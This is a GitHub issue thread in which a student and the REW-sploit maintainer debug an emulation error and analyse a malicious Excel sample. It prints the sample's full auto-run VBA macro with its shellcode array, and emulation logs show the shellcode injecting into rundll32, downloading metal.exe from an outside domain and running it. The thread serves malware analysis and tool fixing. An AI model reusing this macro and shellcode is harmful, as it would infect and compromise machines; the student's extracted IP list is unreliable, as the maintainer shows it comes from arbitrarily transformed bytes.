shellcode: Caught error: 'NoneType' object has no attribute 'startswith' #13
Comments
|
Hello. Thanks for opening the issue. Would you mind to share the shell.bin file? Thanks! |
|
By the way I am able to run this just using Speakeasy.
I was just curious to run it in REW-sploit.
This is part of an ongoing competition/challenge that ends Sunday.
Thanks,
Michelle
…________________________________
From: cecio ***@***.***>
Sent: Saturday, May 14, 2022 1:17 AM
To: REW-sploit/REW-sploit ***@***.***>
Cc: Umali, Michelle ***@***.***>; Author ***@***.***>
Subject: Re: [REW-sploit/REW-sploit] shellcode: Caught error: 'NoneType' object has no attribute 'startswith' (Issue #13)
Hello.
Thanks for opening the issue.
Would you mind to share the shell.bin file?
It would be very helpful to track down the problem.
Thanks!
—
Reply to this email directly, view it on GitHub<#13 (comment)>, or unsubscribe<https://github.com/notifications/unsubscribe-auth/AINWDOTITZISBGWO3DZZIHLVJ5OTHANCNFSM5V5DOFWA>.
You are receiving this because you authored the thread.Message ID: ***@***.***>
|
|
Interesting.... If you want to share it, I would be happy to look into this (even when the challenge is ended if you prefer). You can upload it here if you want: https://icedrive.net/r/35PGvd8pbfDBdcdhTf3hc9Gdp8DdcdPfBdHTk4b3 |
|
Hello Michelle. If you'd like to share the sample, I'd like to look into this error. https://icedrive.net/r/xdfhBdBkF2Cz9pf3G25HrF77GR4VkpFfk6k577xd Thanks a lot |
|
It's already on VirusTotal. I can send you the original zipped file if you'd like.
…________________________________
From: cecio ***@***.***>
Sent: Tuesday, May 17, 2022 2:17 AM
To: REW-sploit/REW-sploit ***@***.***>
Cc: Umali, Michelle ***@***.***>; Author ***@***.***>
Subject: Re: [REW-sploit/REW-sploit] shellcode: Caught error: 'NoneType' object has no attribute 'startswith' (Issue #13)
Hello Michelle.
If you'd like to share the sample, I'd like to look into this error.
In case, here the new link to upload it (the old one is expired):
https://icedrive.net/r/xdfhBdBkF2Cz9pf3G25HrF77GR4VkpFfk6k577xd
Thanks a lot
—
Reply to this email directly, view it on GitHub<#13 (comment)>, or unsubscribe<https://github.com/notifications/unsubscribe-auth/AINWDOT6O6NOVEOJMR76X5TVKNP3FANCNFSM5V5DOFWA>.
You are receiving this because you authored the thread.Message ID: ***@***.***>
|
|
Yes, please, if you can send it would be helpful. Thanks! |
|
Here is the original zipped file.
Hopefully you can let me know when you fixed the bug?
Thanks,
Michelle
…________________________________
From: cecio ***@***.***>
Sent: Wednesday, May 18, 2022 12:05 AM
To: REW-sploit/REW-sploit ***@***.***>
Cc: Umali, Michelle ***@***.***>; Author ***@***.***>
Subject: Re: [REW-sploit/REW-sploit] shellcode: Caught error: 'NoneType' object has no attribute 'startswith' (Issue #13)
Yes, please, if you can send it would be helpful.
Thanks!
—
Reply to this email directly, view it on GitHub<#13 (comment)>, or unsubscribe<https://github.com/notifications/unsubscribe-auth/AINWDOQFIAZLWR66JTVO533VKSJE5ANCNFSM5V5DOFWA>.
You are receiving this because you authored the thread.Message ID: ***@***.***>
|
|
Hello Michelle. I don't see the file nor a link. Thanks! |
|
That is bizarre. I will send it one more time.
I see it on my end. Maybe because it's 28KB?
Or maybe it's been identified as malicious.
Here it is. If you don't see it let me know another way to send it to you.
…________________________________
From: cecio ***@***.***>
Sent: Wednesday, May 18, 2022 3:37 AM
To: REW-sploit/REW-sploit ***@***.***>
Cc: Umali, Michelle ***@***.***>; Author ***@***.***>
Subject: Re: [REW-sploit/REW-sploit] shellcode: Caught error: 'NoneType' object has no attribute 'startswith' (Issue #13)
Hello Michelle.
I don't see the file nor a link.
Where did you put it?
Thanks!
—
Reply to this email directly, view it on GitHub<#13 (comment)>, or unsubscribe<https://github.com/notifications/unsubscribe-auth/AINWDOR5QGXEAUTOKFU53OLVKTB67ANCNFSM5V5DOFWA>.
You are receiving this because you authored the thread.Message ID: ***@***.***>
|
|
No, no files. You can upload it here: https://icedrive.net/r/xdfhBdBkF2Cz9pf3G25HrF77GR4VkpFfk6k577xd Thanks, |
|
[cid:e2ad60a2-870d-4e6f-94e8-edd05f75f96a]
…________________________________
From: cecio ***@***.***>
Sent: Wednesday, May 18, 2022 10:15 PM
To: REW-sploit/REW-sploit ***@***.***>
Cc: Umali, Michelle ***@***.***>; Author ***@***.***>
Subject: Re: [REW-sploit/REW-sploit] shellcode: Caught error: 'NoneType' object has no attribute 'startswith' (Issue #13)
No, no files.
You can upload it here:
https://icedrive.net/r/xdfhBdBkF2Cz9pf3G25HrF77GR4VkpFfk6k577xd
Thanks,
—
Reply to this email directly, view it on GitHub<#13 (comment)>, or unsubscribe<https://github.com/notifications/unsubscribe-auth/AINWDOUL6VBNKSFBEAHZJO3VKXE65ANCNFSM5V5DOFWA>.
You are receiving this because you authored the thread.Message ID: ***@***.***>
|
|
great, got it. Thanks! |
|
By the way I'm new to malware analysis. If you're not busy, can you answer the following question?
I extracted a bunch of IP addresses from the shellcode. Do you have any idea why they would be different from what shows up in VirusTotal?
It's from the sample I gave you.
Thanks,
Michelle
…________________________________
From: cecio ***@***.***>
Sent: Thursday, May 19, 2022 4:33 AM
To: REW-sploit/REW-sploit ***@***.***>
Cc: Umali, Michelle ***@***.***>; Author ***@***.***>
Subject: Re: [REW-sploit/REW-sploit] shellcode: Caught error: 'NoneType' object has no attribute 'startswith' (Issue #13)
great, got it. Thanks!
I'll let you know
—
Reply to this email directly, view it on GitHub<#13 (comment)>, or unsubscribe<https://github.com/notifications/unsubscribe-auth/AINWDOXNNNMHUMS6B4FWEQ3VKYRKFANCNFSM5V5DOFWA>.
You are receiving this because you authored the thread.Message ID: ***@***.***>
|
|
Ok, I replicated the issue, it's a missing check in Speakeasy. I'm going to make a pull request on the SpeakEasy branch to fix this. Regarding your question: I'm not sure to which IP you are referring to, but I found some analysis on VirusTotal with several IP listed: all of them are Microsoft IP which is propably only "noise" created by the Excel or the virtualization environment. Thanks in the meantime |
|
The pull request: |
|
I'm assuming these IP addresses which appear on VirusTotal are from the malware:
[cid:2dd69372-ad72-4ea0-bc98-8ae3facc5a48]
I'm assuming these are Cobalt C2 servers. The IP addresses I extract from the shellcode of the malware are different from above. Why is that? What do you mean they are probably noise from emulation environment?
…________________________________
From: cecio ***@***.***>
Sent: Friday, May 20, 2022 1:38 PM
To: REW-sploit/REW-sploit ***@***.***>
Cc: Umali, Michelle ***@***.***>; Author ***@***.***>
Subject: Re: [REW-sploit/REW-sploit] shellcode: Caught error: 'NoneType' object has no attribute 'startswith' (Issue #13)
Ok, I replicated the issue, it's a missing check in Speakeasy.
I'm going to make a pull request on the SpeakEasy branch to fix this.
Thanks a lot for reporting this.
Regarding your question: I'm not sure to which IP you are referring to, but I found some analysis on VirusTotal with several IP listed: all of them are Microsoft IP which is propably only "noise" created by the Excel or the emulation environment.
If you show me at which analysis you are referring I can have a look.
Thanks in the meantime
—
Reply to this email directly, view it on GitHub<#13 (comment)>, or unsubscribe<https://github.com/notifications/unsubscribe-auth/AINWDOQK7K36CZWDDWK7WRTVK7Z2RANCNFSM5V5DOFWA>.
You are receiving this because you authored the thread.Message ID: ***@***.***>
|
|
If you attached a screenshot, I don't see it (images can be shared here only if you save them somewhere on the web, on github itself or to imgur for example). Try to give me the link to the page. |
|
BTW, by using REW-sploit I was able to complete the emulation, and this is what the injected part is doing: |
|
Thanks. This is what I got from Speakeasy which just loops from CreateProcess to Sleep :
0x109b: 'kernel32.GetStartupInfoA(0x1203eb4)' -> None
0x10bc: 'kernel32.CreateProcessA(0x0, "rundll32", 0x0, 0x0, 0x0, "CREATE_NO_WINDOW | CREATE_SUSPENDED", 0x0, 0x0, 0x1203eb4, 0x1203f14)' -> 0x1
0x10d3: 'kernel32.VirtualAllocEx("rundll32", 0x0, 0x1000, 0x1000, "PAGE_EXECUTE_READWRITE")' -> 0x50000
0x10e5: 'kernel32.WriteProcessMemory("rundll32", 0x50000, 0x1114, 0x1be, 0x1203e54)' -> 0x1
0x10f8: 'kernel32.CreateRemoteThread("rundll32", 0x0, 0x0, 0x50000, 0x0, 0x0, 0x0)' -> 0x228
0x1101: 'kernel32.Sleep(0xffffffff)' -> None
Did you give Speakeasy any DLLs to get the output from REW-sploit in your email below?
So for the list of IP addresses, I get the IP list when I put the unzipped xls file in VirusTotal so I do not have a link to share. So I am still wondering why the IP addresses I extracted from the shellcode are different from what VirusTotal shows when you put the invoice-02-01-2022.xls file in VirusTotal.
…________________________________
From: cecio ***@***.***>
Sent: Saturday, May 21, 2022 2:38 AM
To: REW-sploit/REW-sploit ***@***.***>
Cc: Umali, Michelle ***@***.***>; Author ***@***.***>
Subject: Re: [REW-sploit/REW-sploit] shellcode: Caught error: 'NoneType' object has no attribute 'startswith' (Issue #13)
BTW, by using REW-sploit I was able to complete the emulation, and this is what the injected part is doing:
[+] Emulation ended
(REW-sploit)<< emulate_payload -P /tmp/tmpnjm0m40e/0x50000.bin -U 0
[+] Starting emulation
* exec: shellcode
0x10a4: 'kernel32.LoadLibraryA("wininet")' -> 0x7c054000
0x10b2: 'wininet.InternetOpenA("wininet", 0x0, 0x0, 0x0, 0x0)' -> 0x20
0x10c8: 'wininet.InternetConnectA(0x20, "shinyobjects.birds", 0x50, 0x0, 0x0, 0x3, 0x0, 0x0)' -> 0x24
0x10e0: 'wininet.HttpOpenRequestA(0x24, 0x0, "/metal.exe", 0x0, 0x0, 0x0, "INTERNET_FLAG_DONT_CACHE | INTERNET_FLAG_IGNORE_CERT_CN_INVALID | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID | INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_NO_AUTO_REDIRECT | INTERNET_FLAG_NO_UI | INTERNET_FLAG_RELOAD", 0x0)' -> 0x28
0x10f9: 'wininet.InternetSetOptionA(0x28, 0x1f, 0x1203fd8, 0x4)' -> 0x1
0x1107: 'wininet.HttpSendRequestA(0x28, 0x0, 0x0, 0x0, 0x0)' -> 0x1
0x1140: 'kernel32.CreateFileA("chrome.exe", 0x2, 0x2, 0x0, "CREATE_ALWAYS", 0x2, 0x0)' -> 0x80
0x115c: 'wininet.InternetReadFile(0x28, 0x1203cd8, 0x300, 0x1203cd4)' -> 0x1
0x1176: 'kernel32.WriteFile(0x80, "0x1203cd8 (90909090909090909090909090909090)", 0x300, 0x1203cd4, 0x0)' -> 0x1
0x115c: 'wininet.InternetReadFile(0x28, 0x1203cd8, 0x300, 0x1203cd4)' -> 0x1
0x1176: 'kernel32.WriteFile(0x80, "0x1203cd8 (cccccccccccccccccccccccccccccccc)", 0x300, 0x1203cd4, 0x0)' -> 0x1
0x115c: 'wininet.InternetReadFile(0x28, 0x1203cd8, 0x300, 0x1203cd4)' -> 0x1
0x1176: 'kernel32.WriteFile(0x80, "0x1203cd8 (cccccccccccccccccccccccccccccccc)", 0x300, 0x1203cd4, 0x0)' -> 0x1
0x115c: 'wininet.InternetReadFile(0x28, 0x1203cd8, 0x300, 0x1203cd4)' -> 0x1
0x1176: 'kernel32.WriteFile(0x80, "0x1203cd8 (cccccccccccccccccccccccccccccccc)", 0x300, 0x1203cd4, 0x0)' -> 0x1
0x115c: 'wininet.InternetReadFile(0x28, 0x1203cd8, 0x300, 0x1203cd4)' -> 0x1
0x1176: 'kernel32.WriteFile(0x80, "0x1203cd8 (cccccccccccccccccccccccccccccccc)", 0x300, 0x1203cd4, 0x0)' -> 0x1
0x115c: 'wininet.InternetReadFile(0x28, 0x1203cd8, 0x300, 0x1203cd4)' -> 0x1
0x1176: 'kernel32.WriteFile(0x80, "0x1203cd8 (cccccccccccccccccccccccccccccccc)", 0x100, 0x1203cd4, 0x0)' -> 0x1
0x115c: 'wininet.InternetReadFile(0x28, 0x1203cd8, 0x300, 0x1203cd4)' -> 0x1
0x1183: 'kernel32.CloseHandle(0x80)' -> 0x1
0x118d: 'kernel32.WinExec("chrome.exe", 0x0)' -> 0x20
0x1196: 'kernel32.ExitProcess(0x0)' -> 0x0
0x1196: 'kernel32.ExitProcess(0x0)' -> 0x0
—
Reply to this email directly, view it on GitHub<#13 (comment)>, or unsubscribe<https://github.com/notifications/unsubscribe-auth/AINWDOXP7DER4S2CKB5WO33VLCVJLANCNFSM5V5DOFWA>.
You are receiving this because you authored the thread.Message ID: ***@***.***>
|
|
No, I just used some of the add-ons of REW-sploit: as you can see the first emulation create a new process and then it creates a new thread in it. By using the Regarding the IPs: I'm not sure which IPs you extracted from the shellcode. The only domain contacted seems to be If I look in VirusTotal for the MD5 of the file you sent me, I see something like this: If these are the IPs you are referring to, you can see that they are all Microsoft related. What I can guess here is that these IP are contacted by the VM used for the analysis (or by excel when it starts) and there were not filtered out from the execution result. But they do not have anything to do with the malware itself. |
|
What's the best way to post what I found? I used Didier Steven's 1768.py script to extract the IP addresses but I had to decode, so to speak, the shellcode first. After googling around I could not find a similar output to what I found below from running 1768.py, the latest version.
Here is a partial list of the IP addresses from running 1768.py on the shellcode from the VBA code from the unzipped version. I then looked them up to see if they are legitimate IP addresses and they seem to be legitimate.
I would assume these are Cobalt C2 servers. Shouldn't these be listed in VirusTotal instead of what you saw with the Microsoft noise IP addresses?
Name, City and Country as listed in iplocation.io/ip-whois-lookup - first block
mov eax : 128 1965325627 59.125.36.117 Chunghwa Telecom Co., Ltd, Taipei City, Taiwan
push : 206 1800057282 194.177.74.107 Dino Bortolotto, Padova, Italy
push : 237 1397950468 4.8.83.83 Level 3 Parent, LLC, Monroe, LA
push : 245 1066189689 121.195.140.63 China Education and Research Network, Beijing, China
push : 278 2277682882 194.174.194.135 Social Online GmbH, Adelsried, Germany
push : 291 3271671490 194.190.1.195 Telecom Samara LLC, Kinel, Russia
push : 302 2562950595 195.133.195.152 Gipromez-network, Moscow, Russia
push : 330 2898429635 195.134.194.172 US-GGTTCOMMUNICATIONS-19970425, Great Britain
What's interesting is when I cut the shellcode into pieces (just experiementing), I would get different IP addresses from the above list.
…________________________________
From: cecio ***@***.***>
Sent: Monday, May 23, 2022 1:14 AM
To: REW-sploit/REW-sploit ***@***.***>
Cc: Umali, Michelle ***@***.***>; Author ***@***.***>
Subject: Re: [REW-sploit/REW-sploit] shellcode: Caught error: 'NoneType' object has no attribute 'startswith' (Issue #13)
No, I just used some of the add-ons of REW-sploit:
as you can see the firs emulation create a new process and then it creates a new thread in it. By using the -T option in emulate_payload, you can easily dump the thread content and then emulate it with a second run.
Consider that right now this will not work for you , since we don't have the pull request merged in Speakeasy yet.
As soon as it will be done I'll publish a new release getting this mod.
Regarding the IPs: I'm not sure which IPs you extracted from the shellcode. The only domain contacted seems to be shinyobjects.birds, which is not-existent....so no IP were actually contacted. But I didn't fully disassembled the sample, so I may be wrong. I just base my assertion on the emulation output. If you want to share the IPs and how you extracted them I can have a look.
If I look in VirusTotal for the MD5 of the file you sent me, I see something like this:
https://www.virustotal.com/gui/file/a3f128976fb477883db4f7ecc2aae05e61e2de224ad584454022aced8f8f5ca5/relations
If these are the IPs you are referring to, you can see that they are all Microsoft related. What I can guess here is that these IP are contacted by the VM used for the analysis (or by excel when it starts) and there were not filtered out from the execution result. But they do not have anything to do with the malware itself.
This is what I mean with "noise" generated by the analysis. And this is why emulation (vs virtualization) can give you better results.
—
Reply to this email directly, view it on GitHub<#13 (comment)>, or unsubscribe<https://github.com/notifications/unsubscribe-auth/AINWDOROAAXTUZDMG5ZUS3DVLM46LANCNFSM5V5DOFWA>.
You are receiving this because you authored the thread.Message ID: ***@***.***>
|
|
Hello Michelle. To be able to reply to you, I need to have a look to the exact code you are using to run the script and the complete command line used. If you want you can upload it here: https://icedrive.net/r/D8trdddVTfrRDg395bBc3z9dBPXDFZhtKZXRcgF7 Right now, what I can say is that these looks to be false positives. Consider that these static tools works great when the input is exactly what they expect, but if:
the results can be totally misleading. From what I saw in the code, there is no evidence of the presence of these IPs. This is another reason to use emulation instead of static tools: usually malicious code use obfuscation/encryption to hide details, and that's why static tools may fails in doing analysis. |
|
Pull request has been merged in Speakeasy. I also published a new release to use the latest commit of it. |
|
I spoke to my professor and she said it's possible these could be vpn addresses so I will need to investigate further. Also I need to confirm the results somehow. But for now the command is
$ python3 1768.py filename
April 16, 2022 version of 1768.py. This extracts Cobalt Strike Beacon configurations.
https://github.com/DidierStevens/DidierStevensSuite/blob/master/1768.py
[https://opengraph.githubassets.com/a5419819a8b418575b834a2136d39484f11f7520c8ae3b466b82b1aade29cf9e/DidierStevens/DidierStevensSuite]<https://github.com/DidierStevens/DidierStevensSuite/blob/master/1768.py>
DidierStevensSuite/1768.py at master · DidierStevens/DidierStevensSuite<https://github.com/DidierStevens/DidierStevensSuite/blob/master/1768.py>
Please no pull requests for this repository. Thanks! - DidierStevensSuite/1768.py at master · DidierStevens/DidierStevensSuite
github.com
…________________________________
From: cecio ***@***.***>
Sent: Monday, May 23, 2022 3:55 AM
To: REW-sploit/REW-sploit ***@***.***>
Cc: Umali, Michelle ***@***.***>; Author ***@***.***>
Subject: Re: [REW-sploit/REW-sploit] shellcode: Caught error: 'NoneType' object has no attribute 'startswith' (Issue #13)
Hello Michelle.
To be able to reply to you, I need to have a look to the exact code you are using to run the script and the complete command line used. If you want you can upload it here: https://icedrive.net/r/D8trdddVTfrRDg395bBc3z9dBPXDFZhtKZXRcgF7
Right now, what I can say is that these looks to be false positives. Consider that these static tools works great when the input is exactly what they expect, but if:
* the input is not a CS beacon
* the input is not a "standard" CS beacon
the results can be totally misleading. From what I saw in the code, there is no evidence of the presence of these IPs. This is another reason to use emulation instead of static tools: usually malicious code use obfuscation/encryption to hide details, and that's why static tools may fails in doing analysis.
—
Reply to this email directly, view it on GitHub<#13 (comment)>, or unsubscribe<https://github.com/notifications/unsubscribe-auth/AINWDOTFBCWYNV5LZT57GYLVLNP3BANCNFSM5V5DOFWA>.
You are receiving this because you authored the thread.Message ID: ***@***.***>
|
|
Sorry, may be I was not clear. What I need is not the code of the 1768.py, but the code of the shellcode analyzed. |
|
Hi,
Did the shellcode you extracted consist of a bunch of numbers?
And say you did see the IP addresses, how would you confirm if they are false positives or legitimate IP addresses?
…________________________________
From: cecio ***@***.***>
Sent: Tuesday, May 24, 2022 12:15 AM
To: REW-sploit/REW-sploit ***@***.***>
Cc: Umali, Michelle ***@***.***>; Author ***@***.***>
Subject: Re: [REW-sploit/REW-sploit] shellcode: Caught error: 'NoneType' object has no attribute 'startswith' (Issue #13)
Sorry, may be I was not clear. What I need is not the code of the 1768.py, but the code of the shellcode analyzed.
This is because I think we are looking at two different things.
For the one I analyzed (the one extracted from the excel file), I don't see the IP you are mentioning, even if I run the 1768.py script on it.
Thanks.
—
Reply to this email directly, view it on GitHub<#13 (comment)>, or unsubscribe<https://github.com/notifications/unsubscribe-auth/AINWDOWSNCQOVXJNULYD7GTVLR62VANCNFSM5V5DOFWA>.
You are receiving this because you authored the thread.Message ID: ***@***.***>
|
|
Hello Michelle. Yes, the shellcode I'm analyzing comes from the array in the VBS script in the excel. Once extracted and emulated in REW-sploit I see:
All these things are coming out from the shellcode saved in the excel you sent me once processed with REW-sploit. I don't see any other IP there (the only connection done is tried against Even if I run the 1768.py utility on that shellcode, I don't see any IP dumped by the utility. That's why I think we are looking at two different things. In the message from yesterday you said:
I'm not sure what you mean here, which kind of decoding you applied. The array itself was valid executable position independent code, so no decoding was needed. Even because, otherwise, it would be impossible to emulate it. Thanks, |
|
So you saw this when you extracted the VBA code?
#If VBA7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Sna As Long, ByVal Ekeqyz As Long, ByVal Iciggaxc As LongPtr, Nlin As Long, ByVal Hhmuvx As Long, Ovdaxfn As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Gxdk As Long, ByVal Ehceqkkx As Long, ByVal Gkryn As Long, ByVal Tsa As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Xaprnto As LongPtr, ByRef Cztskpau As Any, ByVal Vtyiwscis As Long) As LongPtr
#Else
Private Declare Function CreateThread Lib "kernel32" (ByVal Sna As Long, ByVal Ekeqyz As Long, ByVal Iciggaxc As Long, Nlin As Long, ByVal Hhmuvx As Long, Ovdaxfn As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Gxdk As Long, ByVal Ehceqkkx As Long, ByVal Gkryn As Long, ByVal Tsa As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Xaprnto As Long, ByRef Cztskpau As Any, ByVal Vtyiwscis As Long) As Long
#End If
Sub Auto_Open()
Dim Nhxbticl As Long, Wtnqycur As Variant, Ugqir As Long
#If VBA7 Then
Dim Ezhyuw As LongPtr, Vowtv As LongPtr
#Else
Dim Ezhyuw As Long, Vowtv As Long
#End If
Wtnqycur = Array(252, 232, 130, 0, 0, 0, 96, 137, 229, 49, 192, 100, 139, 80, 48, 139, 82, 12, 139, 82, 20, 139, 114, 40, 15, 183, 74, 38, 49, 255, 172, 60, 97, 124, 2, 44, 32, 193, 207, 13, 1, 199, 226, 242, 82, 87, 139, 82, 16, 139, 74, 60, 139, 76, 17, 120, 227, 72, 1, 209, 81, 139, 89, 32, 1, 211, 139, 73, 24, 227, 58, 73, 139, 52, 139, 1, 214, 49, 255, 172, 193, _
207, 13, 1, 199, 56, 224, 117, 246, 3, 125, 248, 59, 125, 36, 117, 228, 88, 139, 88, 36, 1, 211, 102, 139, 12, 75, 139, 88, 28, 1, 211, 139, 4, 139, 1, 208, 137, 68, 36, 36, 91, 91, 97, 89, 90, 81, 255, 224, 95, 95, 90, 139, 18, 235, 141, 93, 129, 196, 112, 254, 255, 255, 141, 84, 36, 96, 82, 104, 177, 74, 107, 177, 255, 213, 141, 68, 36, 96, 235, 96, _
94, 141, 120, 96, 87, 80, 49, 219, 83, 83, 104, 4, 0, 0, 8, 83, 83, 83, 86, 83, 104, 121, 204, 63, 134, 255, 213, 133, 192, 116, 84, 106, 64, 128, 199, 16, 83, 83, 49, 219, 83, 255, 55, 104, 174, 135, 146, 63, 255, 213, 84, 104, 190, 1, 0, 0, 235, 52, 80, 255, 55, 104, 197, 216, 189, 231, 255, 213, 83, 83, 83, 139, 76, 36, 252, 81, 83, 83, 255, 55, _
104, 198, 172, 154, 121, 255, 213, 106, 255, 104, 68, 240, 53, 224, 255, 213, 232, 155, 255, 255, 255, 114, 117, 110, 100, 108, 108, 51, 50, 0, 232, 199, 255, 255, 255, 252, 232, 137, 0, 0, 0, 96, 137, 229, 49, 210, 100, 139, 82, 48, 139, 82, 12, 139, 82, 20, 139, 114, 40, 15, 183, 74, 38, 49, 255, 49, 192, 172, 60, 97, 124, 2, 44, 32, 193, 207, 13, 1, 199, 226, _
240, 82, 87, 139, 82, 16, 139, 66, 60, 1, 208, 139, 64, 120, 133, 192, 116, 74, 1, 208, 80, 139, 72, 24, 139, 88, 32, 1, 211, 227, 60, 73, 139, 52, 139, 1, 214, 49, 255, 49, 192, 172, 193, 207, 13, 1, 199, 56, 224, 117, 244, 3, 125, 248, 59, 125, 36, 117, 226, 88, 139, 88, 36, 1, 211, 102, 139, 12, 75, 139, 88, 28, 1, 211, 139, 4, 139, 1, 208, 137, _
68, 36, 36, 91, 91, 97, 89, 90, 81, 255, 224, 88, 95, 90, 139, 18, 235, 134, 93, 104, 110, 101, 116, 0, 104, 119, 105, 110, 105, 137, 230, 84, 104, 76, 119, 38, 7, 255, 213, 49, 255, 87, 87, 87, 87, 86, 104, 58, 86, 121, 167, 255, 213, 235, 96, 91, 49, 201, 81, 81, 106, 3, 81, 81, 106, 80, 83, 80, 104, 87, 137, 159, 198, 255, 213, 235, 79, 89, 49, 210, _
82, 104, 0, 50, 96, 132, 82, 82, 82, 81, 82, 80, 104, 235, 85, 46, 59, 255, 213, 137, 198, 106, 16, 91, 104, 128, 51, 0, 0, 137, 224, 106, 4, 80, 106, 31, 86, 104, 117, 70, 158, 134, 255, 213, 49, 255, 87, 87, 87, 87, 86, 104, 45, 6, 24, 123, 255, 213, 133, 192, 117, 30, 75, 15, 132, 123, 0, 0, 0, 235, 209, 233, 141, 0, 0, 0, 232, 172, 255, 255, _
255, 47, 109, 101, 116, 97, 108, 46, 101, 120, 101, 0, 235, 107, 49, 192, 95, 80, 106, 2, 106, 2, 80, 106, 2, 106, 2, 87, 104, 218, 246, 218, 79, 255, 213, 147, 49, 192, 102, 184, 4, 3, 41, 196, 84, 141, 76, 36, 8, 49, 192, 180, 3, 80, 81, 86, 104, 18, 150, 137, 226, 255, 213, 133, 192, 116, 45, 88, 133, 192, 116, 22, 106, 0, 84, 80, 141, 68, 36, 12, _
80, 83, 104, 45, 87, 174, 91, 255, 213, 131, 236, 4, 235, 206, 83, 104, 198, 150, 135, 82, 255, 213, 106, 0, 87, 104, 49, 139, 111, 135, 255, 213, 106, 0, 104, 240, 181, 162, 86, 255, 213, 232, 144, 255, 255, 255, 99, 104, 114, 111, 109, 101, 46, 101, 120, 101, 0, 232, 9, 255, 255, 255, 115, 104, 105, 110, 121, 111, 98, 106, 101, 99, 116, 115, 46, 98, 105, 114, 100, 115, _
0)
Ezhyuw = VirtualAlloc(0, UBound(Wtnqycur), &H1000, &H40)
For Ugqir = LBound(Wtnqycur) To UBound(Wtnqycur)
Nhxbticl = Wtnqycur(Ugqir)
Vowtv = RtlMoveMemory(Ezhyuw + Ugqir, Nhxbticl, 1)
Next Ugqir
Vowtv = CreateThread(0, 0, Ezhyuw, 0, 0, 0)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
…________________________________
From: cecio ***@***.***>
Sent: Tuesday, May 24, 2022 5:55 AM
To: REW-sploit/REW-sploit ***@***.***>
Cc: Umali, Michelle ***@***.***>; Author ***@***.***>
Subject: Re: [REW-sploit/REW-sploit] shellcode: Caught error: 'NoneType' object has no attribute 'startswith' (Issue #13)
Hello Michelle.
Yes, the shellcode I'm analyzing comes from the array in the VBS script in the excel. Once extracted and emulated in REW-sploit I see:
* as a first step the loop you mentioned from CreateProcess to Sleep
* as a second step (the dumped thread from the step before) the other list I posted above (connection to shinyobjects.birds, download of 'metal.exe', etc... until the process is exited)
All these things are coming out from the shellcode saved in the excel you sent me once processed with REW-sploit. I don't see any other IP there (the only connection done is tried against shinyobjects.birds).
Even if I run the 1768.py utility on that shellcode, I don't see any IP dumped by the utility. That's why I think we are looking at two different things.
In the message from yesterday you said:
but I had to decode, so to speak, the shellcode first
I'm not sure what you mean here, which kind of decoding you applied. The array itself was valid executable position independent code, so no decoding was needed. Even because, otherwise, it would be impossible to emulate it.
Thanks,
—
Reply to this email directly, view it on GitHub<#13 (comment)>, or unsubscribe<https://github.com/notifications/unsubscribe-auth/AINWDOWMRZA5GST522TDJALVLTGU5ANCNFSM5V5DOFWA>.
You are receiving this because you authored the thread.Message ID: ***@***.***>
|
|
yes, exactly |
|
If I run 1768.py (with option So, may be you are doing something different... |
|
I was in this cybersecurity competition last month. This was one of the challenges:
204 218 231 209 228 236 224 149 236 218 217 217 149 227 222 211 228 228 225 149 223 228 227 149 210 231 149 238 229 209 210 225 222 149 218 231 149 163 163 149 230 218 231 238 225 222 224
It said that this was an encrypted message and they need our help to decode it. I was not able to decode it. But this looks like the shellcode in its number range.
So I experimented with decoding or transforming the shellcode. I used Cyberchef to transform the shellcode. And used that with 1768.py.
And that's it.
…________________________________
From: cecio ***@***.***>
Sent: Wednesday, May 25, 2022 1:23 AM
To: REW-sploit/REW-sploit ***@***.***>
Cc: Umali, Michelle ***@***.***>; Author ***@***.***>
Subject: Re: [REW-sploit/REW-sploit] shellcode: Caught error: 'NoneType' object has no attribute 'startswith' (Issue #13)
If I run 1768.py (with option -r) on the shellcode (the array starting with 252), this is the result:
Parameter: 701 b'shinyobjects.birds'
push : 212 446 b'h\xbe\x01\x00\x00'
push : 505 13184 b'h\x803\x00\x00'
So, may be you are doing something different...
—
Reply to this email directly, view it on GitHub<#13 (comment)>, or unsubscribe<https://github.com/notifications/unsubscribe-auth/AINWDOQBZUQCXR7SLNM7XZLVLXPQTANCNFSM5V5DOFWA>.
You are receiving this because you authored the thread.Message ID: ***@***.***>
|
|
OK, clear now. Consider few aspects:
Applying an arbitrary transformation to what is executable code (like in this case, because it is passed to a |
|
Thank you for your feedback. That has been very helpful.
In a recent malware competition people were told to convert the shellcode from decimal to charcode in Cyberchef and convert that to a binary file without explanation and then run that in Speakeasy. Now I know that that was incorrect. That was not my method, however.
I will continue to dig into this malware as the ip list I generated seems too precise to be considered false positives as it appeared to come from the assembly language code. I'm not sure how the transformed shellcode that I generated affects the assembly language code output from the 1768.py script.
Thank you for your time.
…________________________________
From: cecio ***@***.***>
Sent: Wednesday, May 25, 2022 2:54 AM
To: REW-sploit/REW-sploit ***@***.***>
Cc: Umali, Michelle ***@***.***>; Author ***@***.***>
Subject: Re: [REW-sploit/REW-sploit] shellcode: Caught error: 'NoneType' object has no attribute 'startswith' (Issue #13)
OK, clear now.
Consider few aspects:
* everything represented as a byte, is in the range from 0 to 255, so it's very easy to be in the same range
* if you look at the VBA code, you don't see any transformation of the byte sequence. It is used just as it is and passed to CreateThread
* given what stated before, any further transformation should be done by the shellcode itself, so in this case the emulation is helping you in "unrolling" this kind of obfuscation, and you don't need to apply any further change
Applying an arbitrary transformation to what is executable code (like in this case, because it is passed to a CreateThread API), will not give you anything meaningful to analyze, unless you are sure that the same transformation is in some way done in some point of the process execution. But in this case we don't have any evidence of this, so the code we need to analyze is just the plain array dumped from the VBA.
—
Reply to this email directly, view it on GitHub<#13 (comment)>, or unsubscribe<https://github.com/notifications/unsubscribe-auth/AINWDOWL2PIH7QFWPGTQPQLVLX2HFANCNFSM5V5DOFWA>.
You are receiving this because you authored the thread.Message ID: ***@***.***>
|
|
Thanks to you, I'm going to close the issue. Just some final words:
